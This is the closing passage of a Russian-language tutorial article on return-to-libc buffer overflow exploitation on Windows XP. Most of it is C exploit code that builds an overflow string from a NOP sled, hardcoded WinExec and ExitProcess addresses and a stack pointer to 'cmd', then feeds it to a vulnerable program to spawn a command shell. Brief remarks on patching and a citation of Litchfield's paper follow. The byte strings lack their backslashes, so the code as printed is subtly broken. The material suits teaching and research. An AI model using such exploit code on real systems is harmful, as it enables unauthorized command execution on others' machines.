char buffer[500];

    char r_address1[8]="xC6x84xE6x77";         // адрес функции WinExec для WIN XP

    char r_address2[8]="xB5x5CxE7x77";         // адрес функции ExitProcess для WIN XP

    char pointer_to_cmd[8]="x80xfax12x00";     // адрес строки "cmd" в стэке

    memset(garbage,'x90',256);                    // Заполняем строку мусором (nop)

    strcat(buffer,"cmd ");                         // "cmd "

    strcat(buffer,garbage);                        // "cmd "+nop

    strcat(buffer,r_address1);                     // "cmd "+nop+WinExec

    strcat(buffer,r_address2);                     // "cmd "+nop+WinExec+ExitProcess

    strcat(buffer,pointer_to_cmd);                 // "cmd "+nop+WinExec+ExitProcess+....

    strcpy(garbage,"BUG.EXE ");

    strcat(garbage,buffer);

    //"BUG.EXE "+"cmd "+nop'ы+WinExec+ExitProcess+point_cmd

    WinExec(buffer,1);

}

Как вы могли убедиться, для реализации данной атаки не нужно глубокое знание ассемблера для построения shell-кода. Она гораздо легче реализуется, чем традиционное переполнение буфера. Данный вид атаки на переполнение буфера гораздо более прогрессивный, но существует некоторая сложность построения удалённых эксплоитов данного типа.

По-моему, данная атака представляет собой второе дыхание эксплоитов, ориентированных на переполнение буфера.

Для борьбы с атаками данного вида системные администраторы должны с большим вниманием следить за обновлением программного обеспечения.

При написании статьи использовались материалы:

1. Non-stack Based Exploitation of Buffer Overrun Vulnerabilities on Windows NT/2000/XP by David Litchfield (david@ngssoftware.com).